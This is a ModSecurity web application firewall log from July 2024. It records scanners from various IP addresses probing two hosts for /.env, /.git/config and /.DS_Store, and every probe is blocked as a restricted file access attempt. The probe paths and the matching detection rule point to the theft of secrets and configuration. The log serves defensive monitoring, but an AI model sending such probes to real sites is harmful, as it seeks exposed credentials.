[Wed Jul 17 21:49:18.376819 2024] [:error] [pid 519973] [client 159.65.18.197:50672] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZpggPvRkcrrrWXarPp80igAAAAU"]
[Wed Jul 17 21:49:18.377254 2024] [:error] [pid 519973] [client 159.65.18.197:50672] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZpggPvRkcrrrWXarPp80igAAAAU"]
[Wed Jul 17 21:49:18.468405 2024] [:error] [pid 519972] [client 159.65.18.197:50674] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZpggPsO11Q8kXmCjm2bBTgAAAAg"]
[Wed Jul 17 21:49:18.468914 2024] [:error] [pid 519972] [client 159.65.18.197:50674] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZpggPsO11Q8kXmCjm2bBTgAAAAg"]
[Wed Jul 17 21:49:18.469334 2024] [:error] [pid 519972] [client 159.65.18.197:50674] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZpggPsO11Q8kXmCjm2bBTgAAAAg"]
[Sat Jul 20 15:49:05.633830 2024] [:error] [pid 570320] [client 179.43.188.122:33350] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZpvAUcOHt72Sg-tT-YcztwAAAAY"]
[Sat Jul 20 15:49:05.634697 2024] [:error] [pid 570320] [client 179.43.188.122:33350] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZpvAUcOHt72Sg-tT-YcztwAAAAY"]
[Sat Jul 20 15:49:05.635309 2024] [:error] [pid 570320] [client 179.43.188.122:33350] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZpvAUcOHt72Sg-tT-YcztwAAAAY"]
[Sun Jul 21 05:04:02.449698 2024] [:error] [pid 591449] [client 179.43.188.122:49142] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zpx6ov_6tax-KPccQ9IyJwAAAAI"]
[Sun Jul 21 05:04:02.450514 2024] [:error] [pid 591449] [client 179.43.188.122:49142] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zpx6ov_6tax-KPccQ9IyJwAAAAI"]
[Sun Jul 21 05:04:02.451061 2024] [:error] [pid 591449] [client 179.43.188.122:49142] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zpx6ov_6tax-KPccQ9IyJwAAAAI"]
[Sun Jul 21 08:08:25.202695 2024] [:error] [pid 591451] [client 45.148.10.230:57358] [client 45.148.10.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zpyl2XrY20R6_4vya-M4UQAAAAQ"]
[Sun Jul 21 08:08:25.203354 2024] [:error] [pid 591451] [client 45.148.10.230:57358] [client 45.148.10.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zpyl2XrY20R6_4vya-M4UQAAAAQ"]
[Sun Jul 21 08:08:25.203797 2024] [:error] [pid 591451] [client 45.148.10.230:57358] [client 45.148.10.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zpyl2XrY20R6_4vya-M4UQAAAAQ"]
[Sun Jul 21 19:17:31.823151 2024] [:error] [pid 594105] [client 83.147.52.49:54792] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zp1Cqz22MsKygBmWwLWfrgAAAAY"]
[Sun Jul 21 19:17:31.823680 2024] [:error] [pid 594105] [client 83.147.52.49:54792] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zp1Cqz22MsKygBmWwLWfrgAAAAY"]
[Sun Jul 21 19:17:31.824146 2024] [:error] [pid 594105] [client 83.147.52.49:54792] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zp1Cqz22MsKygBmWwLWfrgAAAAY"]
[Sun Jul 21 21:48:50.651214 2024] [authz_core:error] [pid 609700] [client 139.162.155.225:46490] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Jul 21 21:48:51.661122 2024] [:error] [pid 609729] [client 139.162.155.225:49148] [client 139.162.155.225] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Zp1mIxY1H2Vb4c0B73zAjgAAAAc"]
[Sun Jul 21 21:48:51.661609 2024] [:error] [pid 609729] [client 139.162.155.225:49148] [client 139.162.155.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Zp1mIxY1H2Vb4c0B73zAjgAAAAc"]
[Sun Jul 21 21:48:51.662057 2024] [:error] [pid 609729] [client 139.162.155.225:49148] [client 139.162.155.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Zp1mIxY1H2Vb4c0B73zAjgAAAAc"]
[Sun Jul 21 21:48:51.713496 2024] [:error] [pid 609726] [client 139.162.155.225:49162] [client 139.162.155.225] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zp1mIy1fOVmiPzTMHE1mkgAAAAU"]
[Sun Jul 21 21:48:51.713877 2024] [:error] [pid 609726] [client 139.162.155.225:49162] [client 139.162.155.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zp1mIy1fOVmiPzTMHE1mkgAAAAU"]
[Sun Jul 21 21:48:51.714213 2024] [:error] [pid 609726] [client 139.162.155.225:49162] [client 139.162.155.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zp1mIy1fOVmiPzTMHE1mkgAAAAU"]
[Sun Jul 21 21:48:51.767135 2024] [:error] [pid 609698] [client 139.162.155.225:49174] [client 139.162.155.225] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zp1mI3ToteyZIWvBG1rDcAAAAAA"]
[Sun Jul 21 21:48:51.767623 2024] [:error] [pid 609698] [client 139.162.155.225:49174] [client 139.162.155.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zp1mI3ToteyZIWvBG1rDcAAAAAA"]
[Sun Jul 21 21:48:51.768056 2024] [:error] [pid 609698] [client 139.162.155.225:49174] [client 139.162.155.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zp1mI3ToteyZIWvBG1rDcAAAAAA"]
[Sun Jul 21 21:51:03.871477 2024] [:error] [pid 609698] [client 185.196.9.227:40788] [client 185.196.9.227] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zp1mp3ToteyZIWvBG1rDcgAAAAA"]
[Sun Jul 21 21:51:03.872091 2024] [:error] [pid 609698] [client 185.196.9.227:40788] [client 185.196.9.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zp1mp3ToteyZIWvBG1rDcgAAAAA"]
[Sun Jul 21 21:51:03.872573 2024] [:error] [pid 609698] [client 185.196.9.227:40788] [client 185.196.9.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zp1mp3ToteyZIWvBG1rDcgAAAAA"]
[Mon Jul 22 14:19:47.348806 2024] [:error] [pid 618203] [client 194.55.186.87:34114] [client 194.55.186.87] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zp5OY0GvKALxNmveOB6kBgAAAAg"]
[Mon Jul 22 14:19:47.349502 2024] [:error] [pid 618203] [client 194.55.186.87:34114] [client 194.55.186.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zp5OY0GvKALxNmveOB6kBgAAAAg"]
[Mon Jul 22 14:19:47.349954 2024] [:error] [pid 618203] [client 194.55.186.87:34114] [client 194.55.186.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zp5OY0GvKALxNmveOB6kBgAAAAg"]
[Tue Jul 23 20:31:45.723567 2024] [:error] [pid 641413] [client 45.148.10.142:38572] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zp_3EfPM2LurmMBlWYT4dQAAAAc"]
[Tue Jul 23 20:31:45.725433 2024] [:error] [pid 641413] [client 45.148.10.142:38572] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zp_3EfPM2LurmMBlWYT4dQAAAAc"]
[Tue Jul 23 20:31:45.725885 2024] [:error] [pid 641413] [client 45.148.10.142:38572] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zp_3EfPM2LurmMBlWYT4dQAAAAc"]
[Tue Jul 23 20:31:45.778902 2024] [:error] [pid 638248] [client 45.148.10.142:38582] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zp_3EVVnz82lXVFBiH_URQAAAAU"]
[Tue Jul 23 20:31:45.779485 2024] [:error] [pid 638248] [client 45.148.10.142:38582] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zp_3EVVnz82lXVFBiH_URQAAAAU"]
[Tue Jul 23 20:31:45.779925 2024] [:error] [pid 638248] [client 45.148.10.142:38582] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zp_3EVVnz82lXVFBiH_URQAAAAU"]
[Wed Jul 24 20:08:12.706178 2024] [:error] [pid 662070] [client 179.43.149.114:42962] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqFDDLgLmTMp-dsnGrPovwAAAAc"]
[Wed Jul 24 20:08:12.706847 2024] [:error] [pid 662070] [client 179.43.149.114:42962] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqFDDLgLmTMp-dsnGrPovwAAAAc"]
[Wed Jul 24 20:08:12.707322 2024] [:error] [pid 662070] [client 179.43.149.114:42962] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqFDDLgLmTMp-dsnGrPovwAAAAc"]
